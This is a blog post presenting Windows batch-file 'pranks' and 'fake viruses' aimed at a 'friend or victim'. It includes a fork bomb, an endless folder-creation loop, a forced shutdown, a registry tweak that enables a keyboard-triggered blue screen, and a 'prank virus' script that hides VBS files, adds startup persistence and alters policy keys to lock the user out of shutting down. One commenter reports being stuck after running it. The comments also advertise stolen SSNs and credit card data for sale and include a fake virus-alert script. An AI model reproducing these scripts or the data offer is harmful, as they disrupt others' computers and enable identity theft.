funny cmd notepad cmd tricks

TRICKS & HACK WITH BATCH FILE (.Bat File) Posted By PRASAD NELLOR KINGS contact:: 8341986082
(.Bat file)
Welcome to (HACKING begins - "An approach to introduce people with the truth of HACKING"), Hello friends, Today in this post I'll show you how can you prank or make fake viruses using batch files, In my earlier post I'll introduce you with the BEGINNERS GUIDE TO BATCH PROGRAMMING, here you find some basic about batch file, now begin with some programs in batch file so with the help of this program you can make prank or make some fake viruses. We know that Batch files are basically plain text file containing DOS command. You can edit or write your batch file with notepad or DOS editor(EDIT). Always remember that a batch file should have an extension.BAT.

1. MATRIX EFFECT ▼

Follow the steps and see the amazing matrix effect happen in your DOS window :
·         Open Notepad.
·         Copy the below mentioned text in your notepad file:
@echo off
 color 02
:start
echo %random% %random% %random% %random% HACKING begins %random% %random% %random% %random% %random% %random%
goto start
·         Save the file with .bat extension like Matrix.bat. you can also change the text and color.
2. CONTINUOUSLY REPEAT MESSAGE ▼

Using this notepad trick you can annoy anyone and can actually force them to log off . This notepad trick will create an infinite cycle of a message in the computer. Follow the steps to know more: 
·         Open Notepad.
·         Copy the below mentioned text in your notepad file:
@echo off
:BEGIN
msg * Welcome
msg * To
msg * HACKING begins
msg * Thanks for visiting
goto BEGIN
·         Save the file with .bat extension like message.bat. After saving the file just open it (by double clicking) and see what happens.
3. Open Notepad CONTINUOUSLY ▼ 

 Follow these steps to open Notepad continuously:
·         Open Notepad.
·         Copy the below mentioned text in your notepad file:
@echo off
:TOP
START %SystemRoot%/system32/notepad.exe
goto TOP
·          Save the file with any name nut with .bat extension and close it.
Now open the file and see how it annoys you by opening notepad again and again. you can also save this .bat file into the C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder, so when you start your computer then file runs into your computer & then Notepad continuously open in window.

4.OPEN CMD CONTINUOUSLY ▼  
This trick is used to open CMD continuously till then you want, just open Notepad and write : START, depending upon you how many times you want to open CMD, you can make as many as you would like.

  Save file as any name you want with .bat extension. Then open that file and you observe that how many times you write START in Notepad, the CMD console box is open same as number of START written in Notepad.


5. SHUTDOWN SYSTEM WITH MESSAGE ▼
This trick is used for shutdown your friend system, after display an message. When you friend or victim click on OK button, then the bat file force the system to shutdown. Follow these steps to turn off system.
·         Open Notepad.
·         Copy & paste the below code into Notepad.
@echo off
cls
msg * I  HATE YOU
shutdown -s -c "ERROR! YOU ARE HACKED"

·         Save the file with any name nut with .bat extension and close it.You can stop execution of file by typing "shutdown -a"  in RUN dialog box. 
 6. Crash a Computer with just a link▼


Click Here (http://tiny.cc/ibJUN) HAHAHAHA
7. Folder Bomber▼This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top


Save it as 3000.bat

Give this file to your friend and when he will click on that his nightmare will be started.


Above Code Explained.

@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and 


%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.


8. Fork Bomber


It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste 


the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />

9. Getting Blue Screen Of Death (BOSD)▼
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever


you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to 



c
rash your Windows box. 
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to 


reboot it. Just follow these steps:
Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key 


twice.


10. Prank Virus▼


Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.


@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"


8 comments:

  1. Hey Guys !

    USA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  2. How to non active number 10 please?

    ReplyDelete
  3. color 4
    echo windows is Attacked warning
    msg * The windows Detected Gen:Heur.MSIL.Bladabindi.1 (B) please fix
    msg * click ok please
    :windows is fix this show the problem please wait!
    :windows ////application///
    :windows is starting the scan please wait for the running scan
    msg * please del this application for fix hackinject i hack u i a virus ? D xd
    :windows is doing to fix this problem wait!
    sfc /SCANNOW
    @echo off
    echo.
    echo.
    echo.
    color 0
    echo VIRUS IS FIX PLEASE RUN ADMINISTRATE TO FIX @!
    pause
    :a
    echo error please try. again!
    pause
    :a
    echo succesfully? but you runned administrate if you dont run not working.!
    pause
    :a
    sfc /SCANNOW
    PAUSE
    :a
    it's new virus prank!

    ReplyDelete
  4. The last one are a true virus

    ReplyDelete
  5. help me guys i am in problem my i paste code no 10 and run after that my laptop is telling me you are screwed!!!!!!!!!!!!

    ReplyDelete
  6. how to deactivate last one!!

    ReplyDelete